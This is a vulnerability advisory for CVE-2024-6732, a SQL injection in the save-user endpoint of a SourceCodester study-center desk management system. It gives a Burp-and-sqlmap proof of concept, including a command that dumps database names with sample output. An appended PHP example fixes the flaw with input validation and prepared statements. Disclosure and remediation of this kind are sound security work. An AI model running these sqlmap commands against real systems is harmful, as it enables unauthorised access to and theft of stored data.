
CVE-2024-6732

 

Details

Attack type: SQL injection

CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Vendor: SourceCodester

Product: Student Study Center Desk Management System

Affected components: /sscdms/classes/Users.php?f=save

Injection parameter: MULTIPART id

 

POC

1. Intercept the request using Burp Suite Proxy.

2. Save the request to save_user.txt.

The vulnerability can be verified with the following command:

sqlmap -r save_user.txt --batch


Parameter: MULTIPART id ((custom) POST)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: -----------------------------375499073526017961903522895095
Content-Disposition: form-data; name="id"

Databases can be dumped using the following command:

sqlmap -r save_user.txt --batch --dbs


[10:46:50] [INFO] fetching database names
[10:46:50] [INFO] retrieved: 'information_schema'
[10:46:50] [INFO] retrieved: 'sscdms'
available databases [2]:
[*] information_schema
[*] sscdms
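
Remediation for this class of finding, as an added example (not SourceCodester's code and not part of the original advisory): the multipart `id` field is validated as a positive integer and every value reaches the database through a prepared statement. The function name `save_user`, the `users` table and its columns are hypothetical, and an in-memory SQLite database stands in for the application's MySQL database so the script runs offline.

```php
<?php
// Added example: hardened handling of the multipart "id" field in a
// save-user action. Table and column names are hypothetical; SQLite in
// memory is an assumption made so the script needs no database server.

function save_user(PDO $db, array $post): array
{
    $rawId = $post['id'] ?? '';
    $id = null;
    if ($rawId !== '') {
        // Accept only a positive integer; anything else (including an
        // array value) is rejected before any SQL is built.
        $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
        if ($id === false) {
            return ['status' => 'failed', 'msg' => 'invalid id'];
        }
    }
    $name = (string)($post['firstname'] ?? '');
    $user = (string)($post['username'] ?? '');

    if ($id === null) {
        // New record: every value is bound, none is concatenated.
        $stmt = $db->prepare('INSERT INTO users (firstname, username) VALUES (?, ?)');
        $stmt->execute([$name, $user]);
        return ['status' => 'success', 'id' => (int)$db->lastInsertId()];
    }

    // Existing record: the id is bound as an integer parameter.
    $stmt = $db->prepare('UPDATE users SET firstname = ?, username = ? WHERE id = ?');
    $stmt->bindValue(1, $name);
    $stmt->bindValue(2, $user);
    $stmt->bindValue(3, $id, PDO::PARAM_INT);
    $stmt->execute();
    return ['status' => 'success', 'id' => $id];
}

// Constructed sample data.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, firstname TEXT, username TEXT)');
$db->exec("INSERT INTO users (firstname, username) VALUES ('Ann', 'ann'), ('Bob', 'bob')");

// A well-formed id updates one row; a non-integer id is refused.
var_dump(save_user($db, ['id' => '2', 'firstname' => 'Robert', 'username' => 'bob']));
var_dump(save_user($db, ['id' => '2 AND 1=1', 'firstname' => 'x', 'username' => 'y']));
var_dump($db->query('SELECT firstname FROM users ORDER BY id')->fetchAll(PDO::FETCH_COLUMN));
```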